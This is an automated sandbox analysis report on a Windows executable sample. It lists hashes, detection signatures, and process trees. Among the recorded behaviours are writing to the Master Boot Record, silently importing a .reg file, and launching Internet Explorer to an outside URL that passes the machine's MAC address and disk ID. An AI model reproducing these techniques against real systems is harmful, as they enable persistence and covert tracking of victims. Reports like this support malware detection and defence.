Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
86s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
19/09/2022, 06:13
Static task
static1
Behavioral task
behavioral1
Sample
d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe
Resource
win10v2004-20220901-en
General
-
Target
d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe
-
Size
16KB
-
MD5
d51ebbfd2b0b1d0fa237212c183770c4
-
SHA1
b063f620d68f26f8411045024f631c7a20bb9bc9
-
SHA256
d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98
-
SHA512
6cd1ff448bcc1f7367b7ed156b368d68abba5a5d91b043bcb5151f61ca14327dcf83a4af614188de2adbf442f24ef8526f161f373cf78685c994e655a5d0a01b
-
SSDEEP
384:3at4aSo1+esbKvlJCHJkXnY0bGgFIUXfUGzh6js7lNTn6MIy2:6So1Q4wk3Y0I+gsDn6MI9
Malware Config
Signatures
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{B74B7929-37F6-11ED-A0EE-7A46CE8ECE48} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\NoActivateHandler regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\topic\ = "AppProperties" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\BrowserFlags = "16" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ifexec regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ifexec\ = "[]" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\application regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\topic regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ExplorerFlags = "18" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command\ = "%SystemRoot%\\Explorer.exe /idlist,%I,%L" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\ = "[ViewFolder(\"%l\", %I, %S)]" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\ddeexec\application\ = "Folders" regedit.exe -
Runs .reg file with regedit 1 IoCs
pid Process 2716 regedit.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3932 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe 3932 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 308 iexplore.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3932 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe 308 iexplore.exe 308 iexplore.exe 3132 IEXPLORE.EXE 3132 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3932 wrote to memory of 4992 3932 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe 85 PID 3932 wrote to memory of 4992 3932 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe 85 PID 3932 wrote to memory of 4992 3932 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe 85 PID 3932 wrote to memory of 308 3932 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe 87 PID 3932 wrote to memory of 308 3932 d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe 87 PID 4992 wrote to memory of 2716 4992 cmd.exe 88 PID 4992 wrote to memory of 2716 4992 cmd.exe 88 PID 4992 wrote to memory of 2716 4992 cmd.exe 88 PID 308 wrote to memory of 3132 308 iexplore.exe 89 PID 308 wrote to memory of 3132 308 iexplore.exe 89 PID 308 wrote to memory of 3132 308 iexplore.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe"C:\Users\Admin\AppData\Local\Temp\d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"2⤵
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"3⤵
- Modifies registry class
- Runs .reg file with regedit
PID:2716
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=0046CE8ECE48&Hard=QM00013&ClientType=Home&Process=86&UserID=0030&Authen=803-4652⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:308 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:308 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3132
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5626e2d76f5c328d57a3eff6a7f94d129
SHA1210fd33fa005775b30a8fd40a065a2e788934216
SHA2565d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e
SHA512629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1